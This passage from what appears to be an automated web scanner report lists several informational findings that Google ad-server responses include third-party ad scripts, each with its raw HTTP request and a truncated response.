</script><script src="http://ib.adnxs.com/ab?enc=rgyqDU5E6D-uDKoNTkToPwAAAEAzMwdArgyqDU5E6D-uDKoNTkToP99ronZfgYdlSsYda6b2ziXvT7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAPQ8BAgUCAAQAAAAAJiC3RwAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303662623%29%3Buf%28%27c%27%2C+52368%2C+1303662623%29%3Buf%28%27r%27%2C+173254%2C+1303662623%29%3Bppv%288991%2C+%277315958366698892255%27%2C+1303662623%2C+1303705823%2C+52368%2C+25553%29%3B&cnd=!Qg9ejQiQmQMQxskKGAAg0ccBKEsxERukQU1E6D9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbRP7wAL7igK7F2ivbBeNvE-gfa8MEy-VgMXDg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBAWAt70-0TajcL6K7sQe2vMHtC9fq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyvwLF7MoEVJ26YNwSnGTXHBTcukg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.156. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679650&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661650965&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661650971&frm=1&adk=2614322350&ga_vid=1627517092.1303661651&ga_sid=1303661651&ga_hid=784303803&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:14:08 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2164

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919926&ahcid=1089795&bimpd=AwUq_E6hLJos5E2vUu9cvm5XXQ3Gi9UxyWJGLPxIOdg3DKQL-6lWaDJU64H2wzEU7W2K64N2tBfHSl_Y8FFs6q9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BGRWooZCDwsmwTGoGkFOSS7rm-0eH79R-ZPf16jLVxwKlgHBzIj8H9loLjUdnhyPRbeOfpTS-1mTS87A111rNlAKvcwxugsSnr1idp-aByS3gU2xBm3QHaMdsIoCKhXuXyRKhKXGgpt9ON4nDHaJZDdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ynMX-MZsvrLPipeckFJrph-KwPTremxOkOu-NAr5rfRwQaJQmyFM1l4x-S8oOkTR0WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPelbYMfxTGLhmokb_LiHMdI07NjMOSxqJylcziAJzN-mGX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfqXWX5Skjm4gruJ9NdrOrBjoByWRKoQ3oF0AT_2N-Em_gjdkSW0JhvnWXPD46RI-8Pt_T370WDWWY1SqEwEJwbhnBOUR0uKXwLnlzhRcF-z1AMzSpd4HVsiSQfgdEzLWQlA9y0FUzpqtDC0K6uSmpOaAE0HQb-VqGycWmukn0nOb6o408BxR9uazB8jKSDnLvk&acp=TbRMUAAATmwK5TqGOphVbM7Q0PHrU_Bb0BEJ9A&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBtBH9UEy0TeycAYb1lAfsquHUA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtxau1KJnQa24ScAaMD_bbFM6MNKyg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.157. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680047&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662047220&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662047231&frm=1&adk=2614322350&ga_vid=1889800734.1303662047&ga_sid=1303662047&ga_hid=184650008&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:20:44 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2161

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25622058&ahcid=787926&bimpd=rTkLkqau0QYxEN8cNaNZ1540fgUNTQEFI_-TsQris_yUrlPSSsigYRzdV-ftYQYrNyl8nUEbZUM81SBCKCjJVa9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BAVsGcZaad0LohGRrY_PptpgOqkQGoDTJbJd7uwGGvhIlgHBzIj8H9loLjUdnhyPRbB5cdXFU4eUtt0Sd-buMq4iT9bDskPT3GYIORMjuNHSgU2xBm3QHaMdsIoCKhXuXzRgCD-gHnxGWovO3Pj6yB57QZSR55M9KtvER9_PB-eitC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ykFEGLiLwCfrF_l8MZMrUPZcrbHBKfRsOA81Nd1u8is6AaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeje31BMcyDn3elA9zU91mj8tpJsct7VH1G9-d_6KUMHbX91mNtx9s8FQapZIbkQ1tLXj2l4eq3bXsLRG2lgk3vFQ1hyEc2EaR6nmDIgRgRYe5RRYa-cfSyudFlPXwGJCEdWGFeOJW7Ysm02dNTuGUaDt_T370WDWWY1SqEwEJwbhx8Qd9AYEkrt9Ysl-GVyMgJyFabNKBnxQoIOFlgiYOrJA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRN3AAEYgcK5QPQHd4Gc9VYh_kTRQqV9eMU3w&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBBkQK3E20TYfEEdCHlAfzjPjuAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtxjr5Dx913d7TIvkCTytwexKRMKpw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.158. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303634845&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F23%2Fdork%2Fsecureidentityguardcom%2Fapache-mod-rewrite-off-by-one-buffer-overflow-vulnerability-dork-ghdb-poc-example-report.html&dt=1303616845243&bpp=5&shv=r20110414&jsv=r20110415&correlator=1303616845251&frm=0&adk=1607234649&ga_vid=2065049722.1303616845&ga_sid=1303616845&ga_hid=943068844&ga_fc=0&u_tz=-300&u_his=10&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=27&xpc=wncD24Liaw&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 03:47:23 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 6769

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

24.159. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679581&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661581392&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661581397&frm=1&adk=2614322350&ga_vid=918498602.1303661581&ga_sid=1303661581&ga_hid=284338913&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:12:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25474489&ahcid=640462&bimpd=D1wGbT704vP8WlJTzQ2cV2MLf0crBPVD2Y7dg7y_To5KfJFpWkYyPrBRLwgjCy6YuFTWCPddvgIofnAgOUOLyq9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BH3iX1ZfkEPugt72CmK04CyGDOWIWwtpfKu6Yb9nPGUMhtlfbsVT-wOwKJBNR3jwWTazV0AvbMQZNLntaOeKl1p3e0zVN6loNyK4c_OoCgom8jpD4tX7Nxwn2-BtKmkq7LmKEOeK4ZAoWfwI8SCWgb1j-Ezh3q9PALHUe6oayQIztC8cnfVoc-ffY0bjr9ypPr7vVxLo4SQGNqr6znxbeBigsLTxdpnye91zCQ7JsBxbrg3DoDCmL2ffRtSVuJNqJgaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeuZcgF_uJfsdRlJrg2l5qBJ5nm0lTjSklndxOrj4-IjIX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfrUTIn0Td2nwm_BxyX48CybH3NngsQiO9YMiN-l9OgnK6Lhd38O4b4WbBWengTve4vt_T370WDWWY1SqEwEJwbhoHTLamDrAmQq2DYIVNCf6VQGYjf1QW3f3F61FH8ZW8ZA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRMCgAG27YK5XbJLDQXVk97sR0DVdN5sQtjdA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBHhYPCky0Tba3G8ntlQfWrtDhAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbClYHu9567sukB%26num%3D1%26sig%3DAGiWqtwpBMlqXzWHH4VX4kgZ93lH-yM4vQ%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.160. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679940&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661940967&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303661940980&frm=1&adk=2614322350&ga_vid=1707812897.1303661941&ga_sid=1303661941&ga_hid=785527466&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36813005&fu=4&ifi=1&dtd=16 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:18:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1832

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=xSCwcmgR6T_FILByaBHpPwAAAEAzMwdAxSCwcmgR6T_FILByaBHpPy8ukoDR0nkkSsYda6b2ziVyTbRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAGw8BAgUCAAQAAAAA_iA2zgAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303661951%29%3Buf%28%27c%27%2C+52368%2C+1303661951%29%3Buf%28%27r%27%2C+173254%2C+1303661951%29%3Bppv%288991%2C+%272628363654794456623%27%2C+1303661951%2C+1303705151%2C+52368%2C+25553%29%3B&cnd=!QxFr_wiQmQMQxskKGAAg0ccBKEsx4pnD62gR6T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbRNcgAAksgK5XHBLx9eBe9aJqURUMnJyCDqsg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBboJnck20TcilAsHjlQeFvP34Atfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtwVrMHKKZVemRm5XFLaOSGOVALJPg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.161. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658381022&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658381041&frm=1&adk=513358139&ga_vid=971996930.1303658381&ga_sid=1303658381&ga_hid=548328206&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=33895132&fu=4&ifi=1&dtd=27 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:19:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1771

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=-oTsvI3N5T_6hOy8jc3lPwAAAMDMzARA-oTsvI3N5T_5hOy8jc3lP3oEoPofFMtWSsYda6b2ziWLP7RNAAAAAD8wAAC1AAAAlgIAAAIAAADIpAIA0WMAAAEAAABVU0QAVVNEANgCWgAbC0sAJgcBAgUCAAQAAAAAoyo52gAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303658379%29%3Buf%28%27c%27%2C+52368%2C+1303658379%29%3Buf%28%27r%27%2C+173256%2C+1303658379%29%3Bppv%288991%2C+%276254114635115398266%27%2C+1303658379%2C+1303701579%2C+52368%2C+25553%29%3B&cnd=!CxAduAiQmQMQyMkKGAAg0ccBKEsxRkF1FY7N5T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&pp=TbQ_iwAFgNoK5XTMHexz4Xmkvxrm18k8jxHI-Q&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6yJFiz-0TdqBFszplQfh57HvAdfq-NMBr56U7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYS5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmALoAsACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAb746GF_uDvrsAB%26num%3D1%26sig%3DAGiWqtzhYE0HpLf5jfKnnqXc2D78-PNaCw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.162. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680216&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662216231&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662216243&frm=1&adk=2614322350&ga_vid=1201236310.1303662216&ga_sid=1303662216&ga_hid=2010158345&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:23:33 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2161

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
